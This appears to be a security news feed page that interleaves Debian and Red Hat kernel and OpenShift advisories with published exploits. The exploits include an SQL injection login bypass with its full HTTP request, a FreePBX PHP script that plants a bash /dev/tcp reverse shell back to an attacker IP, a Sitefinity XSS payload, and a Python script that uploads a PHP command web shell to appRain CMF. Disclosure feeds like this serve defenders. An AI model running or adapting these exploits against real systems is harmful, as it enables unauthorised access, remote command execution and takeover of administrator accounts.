This is a vulnerability detection and exploitation tool design to take in a list of targets and check for the arbitrary file read vulnerability in Check Point Security Gateways.

Check Point Security Gateway Arbitrary File Read Detection Tool

Debian Linux Security Advisory 5703-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5703-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
June 02, 2024                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2022-48655 CVE-2023-52585 CVE-2023-52882 CVE-2024-26900  
                 CVE-2024-27398 CVE-2024-27399 CVE-2024-27401 CVE-2024-35848  
                 CVE-2024-35947 CVE-2024-36017 CVE-2024-36031 CVE-2024-36883  
                 CVE-2024-36886 CVE-2024-36889 CVE-2024-36902 CVE-2024-36904  
                 CVE-2024-36905 CVE-2024-36916 CVE-2024-36919 CVE-2024-36929  
                 CVE-2024-36933 CVE-2024-36934 CVE-2024-36939 CVE-2024-36940  
                 CVE-2024-36941 CVE-2024-36946 CVE-2024-36950 CVE-2024-36953  
                 CVE-2024-36954 CVE-2024-36957 CVE-2024-36959

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 5.10.218-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmZcl2BfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0T0Sw//XK7kn+jtJzbA6ZB2hI9ORfNOwOIuFpjc19ZRV1SVQDknnqqbbRn1R+oA  
Dlt8KqymYgIn+Mcqp96+xLfzS2F6dnLQlR/QBW47ve6dpjiVKWm7NxJHQaK7hmS6  
q8glRv5yyJN5AOeNW2YB3+I18/ru/fuTUzspwQLhFd/8E9EIci8yWwT/xL4pOVHP  
Jg65Q/KJ1fUs+OkOkLHs6nMA5UokQ5P55irSdvI6vtOZpvPsmezM8ogQYJD4TU7h  
IxZNt13EfJooNMR8g6p/ddyZNRYQWSKpxUj/QP9D1jMrrvOH6YOvyvElbggpJJBE  
r5eEz4dziCXq8WeZeu2aEJusRZAug7H5wEq2RmR8UyHmkEjYsmufj3kbmzFdQvp1  
GIuT3/BKVqrkMpZNf+1nh1ysVoHe3rA7jBEutUovV/GYMVkvy+mq9tlg2OrIIIwG  
6Hl4gcMZ/bTHMr3BxAO6TZwnxMxcxu2pex1yRbs9KujBsa1aS2u5BbAddu1h141e  
BCSZbwYK/sE12Rl7S7WGEZkSevnmeovvHjPnx9hP0KhOb/lKCFFPP50YIesWfS2H  
NdpT1vCXdueIhCD+Jj1hnYZbHC/WVgjfAl9ghrDDrcDs3qvdEas/nLDI6VH98wew  
8yFyp+3JikYNQP4cIqzRK2eD7q9VtH3WZQqORApB8zqlEfVuxZ4=  
=DCXU  
-----END PGP SIGNATURE-----

Debian Security Advisory 5703-1

Employee and Visitor Gate Pass Logging System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Employee and Visitor Gate Pass Logging System - SQLi Authentication Bypass# Date: 29.05.2024# Exploit Author: Furkan Eren Tetik# Vendor Homepage: https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=15026&title=Employee+and+Visitor+Gate+Pass+Logging+System+in+PHP+with+Source+Code# Version: 1.0# Tested on: Windows 11, Kali Linux# Employee and Visitor Gate Pass Logging System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.Steps To Reproduce:1 - Go to the login page http://localhost/employee_gatepass/admin/login.php2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field.3 - Click on "Login" button and you are logged in as administrator.PoCRequestPOST /employee_gatepass/classes/Login.php?f=login HTTP/1.1Host: localhostContent-Length: 43sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/employee_gatepass/admin/login.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9f8v4097jovtf6a3igi4l6479iConnection: closeusername=admin'+or+'1'%3D'1&password=furkan--------------------------------------------------------------------------------------------------------------------------------responseHTTP/1.1 200 OKDate: Wed, 29 May 2024 17:01:26 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30X-Powered-By: PHP/8.0.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Origin: *Content-Length: 20Connection: closeContent-Type: text/html; charset=UTF-8{"status":"success"}

Employee And Visitor Gate Pass Logging System 1.0 SQL Injection

FreePBX suffers from a remote code execution vulnerability. Versions 14, 15, and 16 are all affected.

    # Exploit Title: FreePBX 16 -  Remote Code Execution (RCE) (Authenticated)# Exploit Author: Cold z3ro# Date: 6/1/2024# Tested on: 14,15,16# Vendor: https://www.freepbx.org/<?php////// FREEPBX [14,15,16] API Module Authenticated RCE /// Orginal Difcon || https://www.youtube.com/watch?v=rqFJ0BxwlLI/// Cod[3]d by Cold z3ro ///$url = "10.10.10.186"; // remote host$backconnectip = "192.168.0.2";$port = "4444"; $PHPSESSID = "any valid session even extension";  echo "checking $url\n";  $url = trim($url);  $ch = curl_init();  curl_setopt($ch, CURLOPT_URL, 'http://'.$url.'/admin/ajax.php?module=api&command=generatedocs');  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);  curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2);  curl_setopt($ch, CURLOPT_TIMEOUT, 2);  curl_setopt($ch, CURLOPT_HTTPHEADER, [    'Referer: http://'.$url.'/admin/config.php?display=api',    'Content-Type: application/x-www-form-urlencoded',  ]);  curl_setopt($ch, CURLOPT_COOKIE, 'PHPSESSID='.$PHPSESSID);  curl_setopt($ch, CURLOPT_POSTFIELDS, 'scopes=rest&host=http://'.$backconnectip.'/$(bash -1 >%26 /dev/tcp/'.$backconnectip.'/4444 0>%261)');  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  echo $response = curl_exec($ch)."\n";  curl_close($ch);?>

FreePBX 16 Remote Code Execution

Sitefinity version 15.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Sitefinity 15.0 - Cross-Site Scripting (XSS)# Date: 2023-12-05# Exploit Author: Aldi Saputra Wahyudi# Vendor Homepage: https://www.progress.com/sitefinity-cms# Version: < 15.0.0# Tested on: Windows/Linux# CVE : CVE-2023-27636# Description: In the backend of the Sitefinity CMS, a Cross-site scripting vulnerability has been discovered in all features that use SF-Editor# Steps To Reproduce:Attacker as lower privilegeVictim as Higher privilege1. Login as an Attacker2. Go to the function using the SF Editor, go to the news page as example3. Create or Edit news item4. On the content form, insert the XSS payload as HTML5. After the payload is inserted, click on the content form (just click) and publish or save6. If the victim visits the page with XSS payload, XSS will be triggeredPayload: <noalert><iframe src="javascript:alert(document.domain);">

Sitefinity 15.0 Cross Site Scripting

Red Hat Security Advisory 2024-3530-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3530.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kernel-rt security and bug fix updateAdvisory ID:        RHSA-2024:3530-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3530Issue date:         2024-05-31Revision:           03CVE Names:          CVE-2023-52578====================================================================Summary: An update for kernel-rt is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.Security Fix(es):* kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (CVE-2024-1086)* kernel: net: bridge: data races indata-races in br_handle_frame_finish() (CVE-2023-52578)Bug Fix(es):* kernel-rt: update RT source tree to the latest RHEL-8.4.z Batch 25 (JIRA:RHEL-36724)* [RHEL-8.4] kernel-rt-debug: BUG: sleeping function called from invalid context at kernel/locking/rtmutex.c:968 (JIRA:RHEL-8758)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-52578References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2262126https://bugzilla.redhat.com/show_bug.cgi?id=2267758

Red Hat Security Advisory 2024-3530-03

Red Hat Security Advisory 2024-3529-03 - An update for kernel is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3529.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kernel security updateAdvisory ID:        RHSA-2024:3529-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3529Issue date:         2024-05-31Revision:           03CVE Names:          CVE-2023-52578====================================================================Summary: An update for kernel is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):* kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (CVE-2024-1086)* kernel: net: bridge: data races indata-races in br_handle_frame_finish() (CVE-2023-52578)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-52578References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2262126https://bugzilla.redhat.com/show_bug.cgi?id=2267758

Red Hat Security Advisory 2024-3529-03

Red Hat Security Advisory 2024-3528-03 - An update for kernel is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include null pointer and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3528.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel security update  
Advisory ID:        RHSA-2024:3528-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3528  
Issue date:         2024-05-31  
Revision:           03  
CVE Names:          CVE-2023-2166  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: NULL pointer dereference in can_rcv_filter (CVE-2023-2166)

* kernel: Slab-out-of-bound read in compare_netdev_and_ip (CVE-2023-2176)

* kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (CVE-2024-1086)

* kernel: net: bridge: data races indata-races in br_handle_frame_finish() (CVE-2023-52578)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-2166

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2187813  
https://bugzilla.redhat.com/show_bug.cgi?id=2187931  
https://bugzilla.redhat.com/show_bug.cgi?id=2262126  
https://bugzilla.redhat.com/show_bug.cgi?id=2267758

Red Hat Security Advisory 2024-3528-03

Red Hat Security Advisory 2024-3349-03 - Red Hat OpenShift Container Platform release 4.12.58 is now available with updates to packages and images that fix several bugs and add enhancements.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3349.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenShift Container Platform 4.12.58 security update  
Advisory ID:        RHSA-2024:3349-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3349  
Issue date:         2024-06-02  
Revision:           03  
CVE Names:          CVE-2024-28180  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.12.58 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.12.

Red Hat Product Security has rated this update as having a security impact of  Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.12.58. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2024:3351

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

Security Fix(es):

* jose-go: improper handling of highly compressed data (CVE-2024-28180)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  
All OpenShift Container Platform 4.12 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

Solution:

https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

CVEs:

CVE-2024-28180

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2268854  
https://issues.redhat.com/browse/OCPBUGS-33175  
https://issues.redhat.com/browse/OCPBUGS-33198  
https://issues.redhat.com/browse/OCPBUGS-33386  
https://issues.redhat.com/browse/OCPBUGS-33422  
https://issues.redhat.com/browse/OCPBUGS-33517  
https://issues.redhat.com/browse/OCPBUGS-33778

Red Hat Security Advisory 2024-3349-03

appRain CMF version 4.0.5 suffers from a remote shell upload vulnerability.

    # Exploit Title: appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated)# Date: 04/28/2024# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://www.apprain.org# Software Link:https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip# Version: latest# Tested on: MacOSimport requestsimport sysimport timeimport randomimport stringdef generate_filename():""" Generate a 5-character random string for filename. """return ''.join(random.choices(string.ascii_lowercase, k=5)) + ".inc"def login(site, username, password):print("Logging in...")time.sleep(2)login_url = f"https://{site}/admin/system"session = requests.Session()login_data = {'data[Admin][admin_id]': username,'data[Admin][admin_password]': password}headers = {'Content-Type': 'application/x-www-form-urlencoded'}response = session.post(login_url, data=login_data, headers=headers)if "Logout" in response.text:print("Login Successful!")return sessionelse:print("Login Failed!")sys.exit()def upload_shell(session, site):print("Shell preparing...")time.sleep(2)filename = generate_filename()upload_url = f"https://{site}/admin/filemanager/upload"files = {'data[filemanager][image]': (filename, "<html><body><form method='GET'name='<?php echo basename($_SERVER['PHP_SELF']); ?>'><input type='TEXT'name='cmd' autofocus id='cmd' size='80'><input type='SUBMIT'value='Execute'></form><pre><?php if(isset($_GET['cmd'])){system($_GET['cmd']); } ?></pre></body></html>", 'image/jpeg')}data = {'submit': 'Upload'}response = session.post(upload_url, files=files, data=data)if response.status_code == 200 and "uploaded successfully" in response.text:print(f"Your Shell is Ready: https://{site}/uploads/filemanager/{filename}")else:print("Exploit Failed!")sys.exit()if __name__ == "__main__":print("Exploiting...")time.sleep(2)if len(sys.argv) != 4:print("Usage: python exploit.py sitename.com username password")sys.exit()site = sys.argv[1]username = sys.argv[2]password = sys.argv[3]session = login(site, username, password)upload_shell(session, site)

Tag

#vulnerability